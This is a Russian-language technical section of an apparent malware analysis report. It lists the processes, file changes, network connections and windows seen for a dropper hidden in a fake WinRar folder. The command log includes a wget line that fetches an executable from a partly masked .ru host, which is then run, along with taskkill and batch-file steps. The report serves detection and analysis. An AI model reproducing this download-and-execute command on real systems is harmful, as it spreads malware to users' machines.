Техническая информация
Запускаемые процессы (командные строки):
- '%PROGRAM_FILES%\Copyright\WinRar\torrent29.exe'
- '%PROGRAM_FILES%\Copyright\WinRar\wget.exe' http://za###alka.ru/35606/torrent29.exe
- '%PROGRAM_FILES%\Copyright\WinRar\torrent29.exe' (загружен из сети Интернет)
- '<SYSTEM32>\ping.exe' ya.ru -n 5
- '<SYSTEM32>\taskkill.exe' /f /im winupd.exe
- '<SYSTEM32>\cmd.exe' /c ""%PROGRAM_FILES%\Copyright\WinRar\winupd.bat" "
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %PROGRAM_FILES%\Copyright\WinRar\WinRar.rar
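Изменения в файловой системе (исходные подзаголовки списков не сохранились; повторяющиеся ниже пути, вероятно, относятся к разным спискам — например, созданных и удалённых файлов):
- %PROGRAM_FILES%\Copyright\WinRar\WinRar.rar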
- %PROGRAM_FILES%\Copyright\WinRar\winupd.bat
- %PROGRAM_FILES%\Copyright\WinRar\torrent29.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %PROGRAM_FILES%\Copyright\WinRar\wget.exe
- %TEMP%\$inst\2.tmp
- %PROGRAM_FILES%\Copyright\WinRar\wget.exe
- %TEMP%\$inst\temp_0.tmp
Сетевая активность (соединение «узел:порт», запрашиваемый по HTTP ресурс, DNS-запросы):
- 'za###alka.ru':80
- za###alka.ru/35606/torrent29.exe
- DNS ASK za###alka.ru
- DNS ASK ya.ru
Окна, фигурирующие в отчёте (класс и заголовок):
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'